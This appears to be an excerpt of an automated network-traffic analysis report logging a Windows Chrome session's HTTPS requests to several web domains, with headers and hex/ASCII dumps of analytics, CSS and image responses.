                                                                                                                                                          2024-06-09 22:41:03 UTC52INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: application/javascript;charset=UTF-8
                                                                                                                                                          2024-06-09 22:41:03 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:03 UTC24INData Raw: 43 6f 6e 74 65 6e 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 0d 0a
                                                                                                                                                          Data Ascii: Content-Encoding: gzip
                                                                                                                                                          2024-06-09 22:41:03 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:41:03 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 30 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 30 32 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Expires: Mon, 10 Jun 2024 22:41:02 GMT
                                                                                                                                                          2024-06-09 22:41:03 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=86400
                                                                                                                                                          2024-06-09 22:41:03 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: HIT


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          253192.168.2.55000513.32.99.1104434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:02 UTC655OUTGET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=js326.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972860577817 HTTP/1.1
                                                                                                                                                          Host: ocsapi-aka.blackkhaki918.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC577INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:03 GMT
                                                                                                                                                          api-elapsed: 27
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Vary: Accept-Encoding,Accept-Encoding,Accept-Encoding
                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                          Via: 1.1 6ae82cc0c8a39c993134c2be90b4d120.cloudfront.net (CloudFront)
                                                                                                                                                          X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                          X-Amz-Cf-Id: EBWMVRVWvek_ooIdthKMuoA2qfMskAQI__8aL_Ey4XsmBh-AGtBTBg==
                                                                                                                                                          2024-06-09 22:41:03 UTC2722INData Raw: 61 39 62 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: a9b{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:41:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          254192.168.2.550004183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:02 UTC580OUTGET /061410/rcenter/common/static/css/gb.validation.min.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC676INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 3788
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-TZ-MP-23-07
                                                                                                                                                          ETag: W/"633d510e-2d52"
                                                                                                                                                          Date: Sat, 08 Jun 2024 22:46:19 GMT
                                                                                                                                                          Last-Modified: Wed, 05 Oct 2022 09:40:30 GMT
                                                                                                                                                          Expires: Mon, 08 Jul 2024 22:46:19 GMT
                                                                                                                                                          Age: 86084
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;tzmp23:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-TZ-MP-23-07
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-14
                                                                                                                                                          X-Cdn-Request-ID: e9d0c07141ead4229c9d3c14ccd39c56
                                                                                                                                                          2024-06-09 22:41:03 UTC3788INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 5a 5b af e2 58 76 7e ae fa 15 4c 97 a2 ea 2e 0e e5 bb b1 4f a9 95 31 60 c0 5c cd 1d a3 48 23 df 6d b0 bd c1 36 18 18 cd c3 48 23 45 8a f2 12 e5 21 52 f2 32 6f 89 22 45 79 1d 29 4a 7e 4d 7a 66 f2 2f b2 6d cc c1 dc ce a5 d3 a9 64 38 85 8f bd bc f7 da eb b6 d7 fa d6 ae 83 7c fa e1 77 bf fb e3 3f fe e6 bf fe f9 af ff f8 af bf fe c3 6f 7f fd 09 79 ff 79 a3 fb b6 b1 2b a8 40 d3 73 bf 7c ff ce 00 5e 58 08 ec bd fe 98 c3 d1 e5 f6 cb fb 77 a1 be 0d 0b b2 63 9b de 63 4e d5 bd 50 f7 21 51 5d fb 01 f0 1f 73 4b 60 a7 14 57 f6 4d db 2b 28 20 0c 81 fb 98 a3 92 b9 0a f0 35 1d 0e c3 96 db 5c 00 1c 5b cb 7d d0 34 ed cb fb 5f bd 7f ff 59 3d 2d 5c 58 ca 9e ee c4 cb 5b ba 6d 5a e1 23 86 a2 7f 06 a7 03 28 9c e1 80 e8 d1 b2 35 4d f7 0e f3 32 02
                                                                                                                                                          Data Ascii: Z[Xv~L.O1`\H#m6H#E!R2o"Ey)J~Mzf/md8|w?oyy+@s|^XwccNP!Q]sK`WM+( 5\[}4_Y=-\X[mZ#(5M2


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          255192.168.2.55000623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC637OUTGET /pc/image-pc/video/lebo_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:03 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17920
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4600"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[4],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE27[3],EU-FRA-paris-GLOBAL1-CACHE24[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2524001
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d4593d7ff1b8671b9499bdbb19eacca6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 67999
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15767INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:03 UTC2153INData Raw: e6 23 15 ac db 45 f6 9d fb d3 09 fc a1 fe 6b c7 b8 ce 5b 8a e3 32 45 e8 58 38 93 72 2e 3d 90 44 83 ff 00 d3 62 a5 40 76 65 b4 d8 29 e8 3f 87 f6 eb 59 fa 63 2f 3a b0 9c 85 b3 20 34 5b c6 3b e2 4f 75 68 e8 1c c4 29 4e 11 36 40 12 f2 7f 14 6e 90 1d c5 54 65 32 50 f2 1d 8f 49 80 81 83 ec ee ee 7a 15 cc 5f 77 75 ad bf d5 c9 91 6d b6 d3 6d ba 9b df 4b 75 69 53 94 1d e6 65 ce df a2 02 e5 55 a9 19 b3 44 47 99 ff 00 48 94 93 9b c5 e4 a7 84 39 8e ce cb c4 ad a4 9f e0 c7 4b 45 2e 1e be 6d e3 af df 6a 6a 52 af 73 38 2f 70 1d 76 14 b6 f2 72 66 a4 37 b5 f8 91 a4 26 23 88 20 e8 4e df 22 94 47 52 05 47 56 ca cd c2 99 87 19 15 33 d9 7d 89 68 46 d7 51 25 c4 3c e9 23 c5 4b 6c 04 9b fd 95 02 85 14 ab 54 b2 a9 45 c5 ea 28 a3 4a 97 1a 0c 77 65 cc 7d 11 a3 32 2e eb ce 1b 24 55
                                                                                                                                                          Data Ascii: #Ek[2EX8r.=Db@ve)?Yc/: 4[;Ouh)N6@nTe2PIz_wummKuiSeUDGH9KE.mjjRs8/pvrf7&# N"GRGV3}hFQ%<#KlTE(Jwe}2.$U


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          256192.168.2.55001590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC609OUTGET /pc/image-pc/index/312/app/h5_icon.png.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC624INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:03 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 8521
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:27 GMT
                                                                                                                                                          ETag: "5d71fe6b-2149"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[4],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE3[15],EU-GER-frankfurt-GLOBAL1-CACHE8[0,TCP_HIT,14],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3d5314749010c6deea13324377b6b1c3
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893219
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC8521INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5e 00 00 00 6a 08 06 00 00 00 35 39 e6 d5 00 00 20 00 49 44 41 54 78 5e ed 9d 09 78 14 47 96 a0 5f 66 65 1d 92 aa 54 a5 5b e8 a8 43 02 71 b6 b9 c1 e6 32 36 98 c3 47 db 34 58 d8 34 ee b6 c7 de f5 f6 8e 67 c7 db 3d bb 9e de dd f6 60 ef ee 6c f7 7e eb 6d f7 b1 d3 d3 3b b8 7d e0 19 83 90 6d da 36 b7 30 f7 7d 63 8c d0 55 a5 2a 49 08 84 ae 3a 54 aa 2b 33 e7 7b 91 99 a5 2a a9 2a 2b 11 58 46 dd c4 f7 f1 01 55 91 99 11 7f bc 7c f1 e2 bd 17 51 14 7c c1 f5 01 05 e9 70 af 8c 1c 01 1e fc 14 7c c1 d9 81 02 db c8 3d f5 de 93 80 07 07 82 3f 06 14 3c 70 0f c7 08 12 e0 e1 38 82 df 06 14 3c 39 82 8f bd f7 28 1e fe 48 c1 76 f6 77 00 d4 bf bb 47 63 24 09 f0 ff 48 c1 17 ec 1b 40 51 af 8f e4 63 ff ec 9f c5 f3 6f 52 f0 39
                                                                                                                                                          Data Ascii: PNGIHDR^j59 IDATx^xG_feT[Cq26G4X4g=`l~m;}m60}cU*I:T+3{**+XFU|Q|p|=?<p8<9(HvwGc$H@QcoR9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          257192.168.2.55000890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC641OUTGET /pc/image-pc/index/312/app/04.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:03 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 114423
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:26 GMT
                                                                                                                                                          ETag: "5d71fe6a-1bef7"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[5],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE6[17],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,16],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b7032651e6304b824cb48462ab192fb9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893219
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15756INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 45 00 00 02 2c 08 06 00 00 00 65 67 bb 52 00 00 20 00 49 44 41 54 78 5e ec bd 07 94 1c d7 79 26 fa 55 ea 38 79 30 11 61 90 23 01 10 04 41 42 60 30 83 28 d1 ca 5e 91 a2 b4 b6 64 d8 5a af 77 25 4b 5e 59 6b c1 7b d6 e7 59 cf e9 ac b5 3e ef ad f5 bc b2 bd b2 6c 89 b2 4c ca b2 44 da 92 48 4b 8c 20 01 02 22 41 12 39 e7 30 39 77 ae f8 ce ff df aa ee ea 9a 0e d3 18 0c 09 42 73 49 9c 99 9e ae ba 75 eb de ff 7e f7 cf bf 84 b9 36 ad 19 70 1c 27 94 4a a5 5a 34 4d 6b 05 b0 12 c0 26 00 ab 4c d3 5c 64 9a 66 3b 80 06 00 31 49 52 54 c7 71 9c 72 9d da 90 8b be 92 25 a9 e8 b3 5d fc b1 ea d8 64 d8 55 af a9 78 81 53 3c 9e 99 75 76 15 77 4b 33 1b bf 6d 97 9d ea ab 18 cc dc 2d 55 67 c0 71 32 00 c6 1d 49 4a 01 ce 98 22 cb
                                                                                                                                                          Data Ascii: PNGIHDRE,egR IDATx^y&U8y0a#AB`0(^dZw%K^Yk{Y>lLDHK "A909wBsIu~6p'JZ4Mk&L\df;1IRTqr%]dUxS<uvwK3m-Ugq2IJ"
                                                                                                                                                          2024-06-09 22:41:03 UTC16384INData Raw: 58 14 54 25 0d 21 ea c7 32 59 ff 67 4a e4 54 40 ee 0f 11 a8 8e 8d 90 99 43 58 71 90 ce ea 90 d4 08 1c 39 c6 4e fd 96 6c 40 cf 65 a0 a8 61 d7 45 46 a4 62 72 14 87 23 01 f4 9c 03 a8 21 28 9c 6d 44 d4 d0 15 1c a3 48 02 91 6f a5 fc e2 ca 65 79 71 eb 4c 57 d3 8b 55 5a 82 99 8a cf 22 81 41 e9 27 f0 7b 29 bc 3a 22 b6 97 22 84 38 7c cf 60 77 1c e2 92 46 53 36 ea a3 1a 9a 94 09 66 59 86 75 8a c4 90 d1 08 07 b1 ba 06 f4 26 0d 64 0d 13 52 2c cc 2a 89 46 18 e8 69 af 47 26 95 c1 58 32 89 a4 a4 22 49 62 b3 4a bb 59 c8 cb aa 23 0b 50 24 5c 61 41 a0 8c cb 92 5b 60 7e 26 24 2a 12 84 d4 d0 02 87 1e 83 a2 af 6c 01 31 8e a6 25 52 88 51 71 36 3b ab 43 8b 84 f9 00 a6 da de 6a 48 84 96 9a 94 8d 89 84 91 89 71 84 e2 71 c8 7c 81 0d db b4 38 3f 80 a5 a8 30 6c 1d b0 74 8e 6e b1 9d
                                                                                                                                                          Data Ascii: XT%!2YgJT@CXq9Nl@eaEFbr#!(mDHoeyqLWUZ"A'{):""8|`wFS6fYu&dR,*FiG&X2"IbJY#P$\aA[`~&$*l1%RQq6;CjHqq|8?0ltn
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 05 43 8a ec 27 53 54 a0 70 ee 51 3f 5e a3 82 ba d5 38 d9 4f 87 d8 c7 ce 7e 8a a4 5c 50 94 be 8c 65 82 c4 ed cf 9c 0b f0 ec 71 7f f6 53 2a bc 9e ed cd 17 7e 92 0f fc d5 49 17 75 42 64 ae 53 2d 95 00 c5 5c 69 8d fd 6c 0f d2 a6 7a 9b fb 9e dc 7b d4 df f6 23 9a f9 80 d5 3e 07 4a 59 a3 f3 83 62 4a d6 55 2e 28 8a b0 c8 39 6f 96 2a 28 96 d2 e1 c5 5c 5b 2a 28 aa 1c 2d 94 16 59 84 98 c1 b0 8e 87 c9 27 16 11 44 8e 82 2a 93 2b 4d 60 98 a1 f7 b2 73 1c aa fa 3a 6c ab 5d f1 22 72 12 d8 a3 6a 28 0f d2 6e 27 92 a3 1c c9 52 93 24 95 ae 81 09 8f 99 7a 72 82 29 62 09 57 19 94 0e ca fb 4c 75 8a 52 9f 3a d6 65 27 bb 98 ab cf 73 99 c1 ed 52 a4 d4 73 0e 66 b5 5c d0 50 8b 58 a5 6f 28 66 8c f3 5d 53 28 7d 43 a1 ef 67 49 47 65 e4 ec b1 9f 31 ae 04 08 96 db 17 c5 de a7 e8 ba cc f1
                                                                                                                                                          Data Ascii: C'STpQ?^8O~\PeqS*~IuBdS-\ilz{#>JYbJU.(9o*(\[*(-Y'D*+M`s:l]"rj(n'R$zr)bWLuR:e'sRsf\PXo(f]S(}CgIGe1
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 8a 9b cd 90 ff 7d 6d 33 e0 88 8b 8b 33 4b 58 ed ea c1 77 af a5 f0 e2 ec 22 b2 c1 20 c2 1d 7d 48 e5 98 fa 6a 14 c3 79 57 53 49 b1 35 92 3b 65 20 b7 84 af 8f c5 f1 89 81 08 f6 c7 23 a7 22 c0 69 d8 10 50 24 82 da a6 89 1c 2a 41 d1 44 2e 93 c1 f1 9b 76 7b 4d 93 b5 0d b5 c6 56 6d eb b8 c6 eb b7 ac d9 76 06 45 de 24 41 88 ff 29 21 12 00 29 dd b1 0c 01 41 91 ce 95 f9 f9 79 91 f0 98 e2 c7 f8 c4 37 de 78 03 7f f3 37 7f 23 d2 e1 f7 bf ff 7d 9c 3c 79 52 7e bf 7c f9 b2 64 b9 dc 75 d7 5d e2 bd a6 b7 9a 59 04 cc 84 21 f8 32 e8 fb be 4f dc b7 21 79 ac 1f 92 d3 b2 6d e7 77 e4 ce c0 e2 ec 1c 56 bb 06 f0 fd e9 3c 7e 7f 6d 06 46 3c 82 de fe 7e e4 12 05 84 43 01 a9 da 31 3e b3 82 4c 2e 0b 23 12 42 2a 93 c1 0e 2d 83 47 86 23 f8 cc de 21 8c 02 6b 40 51 e2 14 6d aa e1 de 38 45
                                                                                                                                                          Data Ascii: }m33KXw" }HjyWSI5;e #"iP$*AD.v{MVmvE$A)!)Ay7x7#}<yR~|du]Y!2O!ymwV<~mF<~C1>L.#B*-G#!k@Qm8E
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: e1 c3 43 b8 77 a0 0b 9d c0 a9 80 85 d3 9a 8e 23 b0 6c bd a0 51 52 f4 41 b1 19 4c 6c 89 4d 91 b9 96 94 86 78 d0 46 48 50 62 58 0c 0f aa b6 04 3a 3e 44 04 49 b6 53 aa 23 41 86 80 e8 3d f8 60 56 82 06 cf e7 a1 24 38 7e af c2 6c bc e7 56 72 29 f2 6f aa ae 6c 1f 0e 85 c5 8e 47 29 52 79 c4 15 b0 b3 0d c7 c4 b1 6e a4 d6 7a 41 91 aa 16 39 14 59 f4 a8 60 e6 c4 f4 4e 96 6a 1e 85 42 5e 72 6d 09 1a 12 af e8 d2 74 a9 b1 b6 8b ef b1 6c 22 bd a1 38 ae b4 4a a0 52 cc 3e 42 03 26 21 35 ae 64 45 22 81 82 25 38 19 08 87 dc 79 20 eb 60 a1 e8 59 76 18 58 e5 0e 49 74 e9 02 2a 4d 0d 95 71 7c 15 c4 b4 37 20 b3 45 f6 10 41 9c 65 75 65 ac 5c 21 27 cc 86 51 0f dc 1b 01 65 fc b4 0b c2 fd 49 3e 4c 16 a5 72 c2 8b c8 df a9 bc cf 8e e4 a9 bc d0 ad 7b a9 d9 98 5c 9c 85 c6 a4 86 50 04 97
